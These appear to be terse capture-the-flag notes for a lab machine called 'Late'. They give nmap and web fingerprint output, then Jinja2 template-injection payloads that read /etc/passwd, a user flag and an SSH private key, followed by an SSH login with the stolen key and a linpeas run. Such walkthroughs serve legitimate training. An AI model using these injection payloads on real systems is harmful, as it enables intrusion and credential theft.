Nmap scan report for 10.10.11.156
Host is up (0.24s latency).
Not shown: 65042 filtered tcp ports (no-response), 491 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js">
http://10.10.11.156 [200 OK] Bootstrap[3.0.0], Country[RESERVED][ZZ], Email[#,support@late.htb],
Google-API[ajax/libs/jquery/1.10.2/jquery.min.js], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)],
IP[10.10.11.156], JQuery[1.10.2], Meta-Author[Sergey Pozhilov (GetTemplate.com)],
Script, Title[Late - Best online image tools], nginx[1.14.0]


image.late.htb
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} > foto.png (background:white/color-font:black/type-latter:anonymous pro 32px)
{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/user.txt").read() }}
[+]user.txt[+]
{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}
[+]ssh id_rsa [+]
ssh svc_acc@10.10.11.156 -i id_rsa
./linpeas.sh
